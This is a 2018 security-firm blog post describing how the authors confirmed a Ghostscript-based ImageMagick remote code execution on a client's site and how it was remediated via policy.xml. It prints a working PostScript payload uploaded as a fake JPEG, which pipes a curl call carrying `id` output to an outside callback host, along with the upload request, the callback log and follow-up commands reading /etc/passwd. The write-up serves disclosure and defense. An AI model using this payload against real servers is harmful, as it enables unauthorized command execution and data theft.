Oct 19, 18 6:42 pm

Was this post helpful?

ImageMagick RCE Take 2

Oct 19, 2018
| by:
Sherif Koussa

Introduction

A new bypass for GhostScript which ImageMagick uses by default for dealing with PostScript, was posted yesterday which allowed attackers to launch remote code execution. This is similar in nature to the ImageTragick bug which plagued ImageMagick where image files containing postscript were sent to ImageMagick and when converted, launched commands against the OS.

As part of our continuous security efforts for our clients, we watch for vulnerabilities that could affect them, and confirm with the clients when they are affected. This was one of those times.

We discovered one of our clients was vulnerable to this exploit. We wrote up the issue and submitted it to them within 24 hours of the issue being released to the public, which they were able to fixed in minutes.

Security Details / Walktrough

One of our clients uses ImageMagick to manage image conversions  to create things such as thumbnails for their website.

The following payload was used as an image upload across all the upload functions on the dev website:

Filename: test.jpg

%!PS

userdict /setpagedevice undef

save

legal

{null restore} stopped {pop} if

{legal} stopped {pop} if

restore

mark /OutputFile (%pipe%curl${IFS}callback.softwaresecured.com/`id`)

currentdevice putdeviceprops

From previous testing with the client we already knew which OS the application was running on, so we were okay using curl. While testing, we started with a call to nslookup, since this is on both Windows and Linux. We then uploaded this POC file to the clients website.

The upload request looks something like the following:

POST /file HTTP/1.1

Host: www.helloworld.com

...snip...

Connection: close

-----------------------------184561271817366

Content-Disposition: form-data; name="file"; filename="test.jpg"

Content-Type: image/jpeg

%!PS

userdict /setpagedevice undef

save

legal

{null restore} stopped {pop} if

{legal} stopped {pop} if

restore

mark /OutputFile (%pipe%curl${IFS}callback.softwaresecured.com/`id`)

currentdevice putdeviceprops

-----------------------------184561271817366--

Which gave back the following response:

HTTP/1.1 400 Bad Request

...snip...

Connection: close

{"errors":{"image":"Image is not valid"}}

On our server we watched the logs for the curl command coming from the clients web server, waiting to see if the user’s ID was included in the URL or not and if we even receive any call at all. After trying many different upload functions, here is the response we received:

GET /www-data HTTP/1.1
User-Agent: curl/7.35.0
Host: callback.softwaresecured.com
Accept: */*

Success! We have remote command execution on the clients web server and the user running the web service is “www-data”. Other commands that worked included:

  • uname -a
  • cat /etc/passwd
  • nslookup

Dangers of Insecure Defaults and Remediation

Luckily for the client, when we tried to cat the /etc/shadow file on the server, we received no data back. This means they run the web service as a lower privilege user.

As of the writing of this post there is now official fix. That being said there is an official workaround. It’s advised to update the policy.xml file which configures ImageMagick. The following is taken from the post on www.kb.cert.org:

Disable PS, EPS, PDF, and XPS coders in ImageMagick policy.xml

ImageMagick uses Ghostscript by default to process PostScript content. ImageMagick can be controlled via the policy.xml security policy to disable the processing of PS, EPS, PDF, and XPS content. For example, this can be done by adding these lines to the section of the /etc/ImageMagick/policy.xml file on a RedHat system:

  • <policy domain="coder" rights="none" pattern="PS" />
  • <policy domain="coder" rights="none" pattern="EPS" />
  • <policy domain="coder" rights="none" pattern="PDF" />
  • <policy domain="coder" rights="none" pattern="XPS" />

Timeline

  • Tue, 21 Aug 2018 05:46:26 -0700: Vulnerability Published
  • Wednesday, 22 Aug 2018 11:21:00 -0500: Vulnerability Confirmed on Client Website
  • Wednesday, 22 Aug 2018 12:26:00 -0500: Vulnerability Published to Client
  • Wednesday, 22 Aug 2018 13:08:00 -0500: Vulnerability Fixed on All Servers

References

Was this post helpful?

About the Author

Sherif Koussa
Sherif Koussa is OWASP Ottawa Chapter Co-Leader, Software Developer, Hacker, and founder and CEO of Software Secured and Reshift. In addition to contributing to OWASP Ottawa for over 14 years, Sherif contributed to WebGoat, and OWASP Cheat Sheets. Sherif also helped the SANS and GIAC organizations launch their GSSP-Java and GSSP-NET exams and contributed to a few of their courses. After switching from the software development field to the security field, Sherif took on the mission of supporting developers shifting security left, and ship more secure code organically.
Share This Post

Leave a Reply

Your email address will not be published.

Related Post

May 17, 2023 by Omkar Hiremath

Risk of Security and Monitoring Logging Failures

Read more

Was this post helpful?

May 1, 2023 by Omkar Hiremath

Intro to Identification and Authentication Failures

Read more

Was this post helpful?

Dec 22, 2022 by Warren Moynihan

3 Types of XSS Attacks & 4 XSS Mitigation Strategies

Read more

Was this post helpful?

Office

301 Moodie Dr. Unit 108
Ottawa ON K2H 9C4

Designed by WP Expert
© 2023
Software Secured
cross